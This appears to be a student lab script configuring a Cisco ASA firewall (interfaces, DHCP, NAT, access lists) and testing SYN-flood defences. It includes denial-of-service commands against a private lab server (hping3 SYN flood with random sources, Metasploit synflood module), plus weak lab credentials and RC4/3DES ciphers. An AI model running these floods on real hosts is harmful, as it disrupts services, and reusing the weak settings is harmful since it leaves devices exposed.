Config_Firewall.sh

1. en
2. conf t
3. hostname ASA
4. domain-name team3.lab
5. username root password team3 privilege 15
6. crypto key generate rsa general-key modulus 2048
7. write
8.  
9.  
10. # Cau hinh may dieu khien
11. show interface ip brief
12. int Management0/0
13. ip address 192.168.56.253 255.255.255.0
14. no shutdown
15. nameif Management
16. management-only
17. security-level 100
18. exit
19.  
20. # Cau hinh may dich vu
21. interface GigabitEthernet0/1
22. nameif dmz
23. ip address 192.168.255.253 255.255.255.0
24. no shutdown
25. exit
26. write
27.  
28. # Cau hinh may inside
29. interface GigabitEthernet0/0
30. nameif inside
31. ip address 192.168.100.253 255.255.255.0
32. no shutdown
33. exit
34. write
35.  
36. # Cau hinh may outside
37. interface GigabitEthernet0/2
38. nameif outside
39. ip address 192.168.133.253 255.255.255.0
40. no shutdown
41. exit
42. write
43.  
44. # Cau hinh SSH
45. aaa authentication ssh console LOCAL
46. ssh 192.168.56.0 255.255.255.0 Management
47.  
48. # Update firmware
49. copy tftp: flash:
50. http server enable
51. http 192.168.56.0 255.255.255.0 Management
52. ssl encryption rc4-sha1 aes128-sha1 aes256-sha1 3des-sha1
53. conf t
54. asdm image flash:/asdm-762-150.bin
55. exit
56. write
57.  
58. # Update anyconnect
59. copy tftp: flash:
60. 192.168.56.1
61. anyconnect-win-4.4.02039.pkg
62. webvpn
63. anyconnect image flash:/anyconnect-win-4.4.02039.pkg
64. anyconnect enable
65. write
66.  
67. # DHCP cho vung inside
68. dhcpd address 192.168.100.101-192.168.100.200 inside
69. dhcpd dns 8.8.8.8 8.8.4.4 interface inside
70. dhcpd lease 28880 interface inside
71. dhcpd domain team3.lab interface inside
72. dhcpd option 3 ip 192.168.100.253 interface inside
73. dhcpd enable inside
74.  
75. dhcpd address 192.168.255.101-192.168.255.200 dmz
76. dhcpd dns 8.8.8.8 8.8.4.4 interface dmz
77. dhcpd lease 28880 interface dmz
78. dhcpd domain team3.lab interface dmz
79. dhcpd option 3 ip 192.168.255.253 interface dmz
80. dhcpd enable dmz
81.  
82. dhcpd address 192.168.133.100-192.168.133.160 outside
83. dhcpd dns 8.8.8.8 8.8.4.4 interface outside
84. dhcpd lease 28880 interface outside
85. dhcpd domain team3.lab interface outside
86. dhcpd option 3 ip 192.168.133.253 interface outside
87. dhcpd enable outside
88.  
89.  
90. # Tao Object
91. object network PUBLIC_IP
92.  range 192.168.133.100 192.168.133.160
93. exit
94. object network DMZ
95.  subnet 192.168.255.0 255.255.255.0
96. exit
97. object network INTERNAL
98.  subnet 192.168.100.0 255.255.255.0
99. exit
100.  
101. # Thiet lap NAT cho vung inside
102. object network INTERNAL
103.  nat (inside,outside) dynamic interface
104. exit
105.  
106. object network DMZ
107.  nat (dmz,outside) dynamic interface
108. exit
109.  
110. object network PUBLIC_IP
111.  nat (outside,dmz) dynamic interface
112. exit
113.  
114.  
115. # Nat cho vung dmz
116. object network WEB-SERVER
117.  host 192.168.255.129
118.  nat (dmz,outside) static interface service tcp 80 80
119. exit
120.  
121. object network WEB-SERVER
122.  host 192.168.255.129
123.  nat (dmz,outside) dynamic interface
124. exit
125.  
126.  
127. # DDos server 192.168.255.129
128. --  Quet port dang bat tren server
129.                                     nmap -Pn -sS 192.168.255.129
130.     Hien cong 23/tcp
131. --  Attack
132.                                     hping3 -S -p 80 --flood --rand-source 192.168.255.129
133.  
134. # Tao access-list cho host 192.168.255.129
135. access-list inside2outside permit ip 192.168.100.0 255.255.255.0 any
136. access-list inside2outside permit icmp 192.168.100.0 255.255.255.0 any
137. access-group inside2outside in interface inside
138.  
139. access-list dmz2outside permit ip 192.168.255.0 255.255.255.0 any
140. access-list dmz2outside permit icmp 192.168.255.0 255.255.255.0 any
141. access-list dmz2outside permit tcp 192.168.255.0 255.255.255.0 any
142. access-group dmz2outside in interface dmz
143.  
144.  
145. access-list outside2dmz permit ip 192.168.133.0 255.255.255.0 any
146. access-list outside2dmz permit icmp 192.168.133.0 255.255.255.0 any
147. access-list outside2dmz permit tcp 192.168.133.0 255.255.255.0 any
148. access-group outside2dmz in interface outside
149.  
150.  
151.  
152. access-list syn permit tcp any host 192.168.255.129 eq telnet
153. access-list syn permit tcp any host 192.168.255.129 eq ssh
154. access-list syn permit tcp any host 192.168.255.129 eq http
155. access-list syn permit tcp any host 192.168.255.129 eq https
156.  
157.  
158. # Defence firewall
159. access-list syn permit tcp any 192.168.255.129 eq 23
160. class-map syn
161. match access-list syn
162. show run service-policy
163. policy-map global_policy
164. class dos
165. set connection embryonic-conn-max 100
166. end
167. show run policy-map
168. show conn count
169.  
170.  
171. policy-map syn
172. class dos
173. set connection embryonic-conn-max 10000
174.  
175.  
176.  
177.  
178.  
179.  
180. conf t
181. access-list syn permit tcp any host 13.0.0.1 eq telnet
182. access-list syn permit tcp any host 13.0.0.1 eq ssh
183. access-list syn permit tcp any host 13.0.0.1 eq http
184. access-list syn permit tcp any host 13.0.0.1 eq https
185. access-list syn permit tcp any host 13.0.0.1
186. write
187. access-group syn in interface outside
188.  
189.  
190. show resource usage all
191. show threat-detection rate
192.  
193.  
194. # Cau hinh may dich vu
195. ifconfig eth0 192.168.255.129 netmask 255.255.255.0
196. route add default gw 192.168.255.253 eth0
197.  
198.  
199.  
200. msfconsole
201. use auxiliary/dos/tcp/synflood
202. show options
203. set RHOST 192.168.255.129
204. exploit
205.  
206.  
207.  
208.  
209. access-list To_server permit tcp any host 192.168.255.101
210. access-list To_server permit tcp any any
211. class-map Traffic_to_dmz_server
212. match access-list To_server
213. exit
214.  
215. policy-map global_policy
216. class Traffic_to_dmz_server
217. set connection embryonic-conn-max 5
218. exit
219. exit
220.  
221.  
222. access-list To_server permit tcp any host 192.168.255.101
223. access-list To_server permit tcp any any
224. class-map Traffic_to_dmz
225. match access-list outside2dmz
226. exit
227.  
228. policy-map global_policy
229. class Traffic_to_dmz
230. set connection embryonic-conn-max 5
231. exit
232. exit
233.  
234.  
235. class-map outside2dmz
236. match access-list outside2dmz
237. policy-map global_policy
238. class outside2dmz
239.  
240. # Attack and defence
241. -- Bat dich vu web
242. sudo python -m SimpleHTTPServer 80
243. -- Quet mo cong 80
244. nmap -Pn -sS -p 80 192.168.255.129
245. --
246. hping3 -S -p 80 --flood --rand-source 192.168.255.129
247.  
248.  
249. class outside2dmz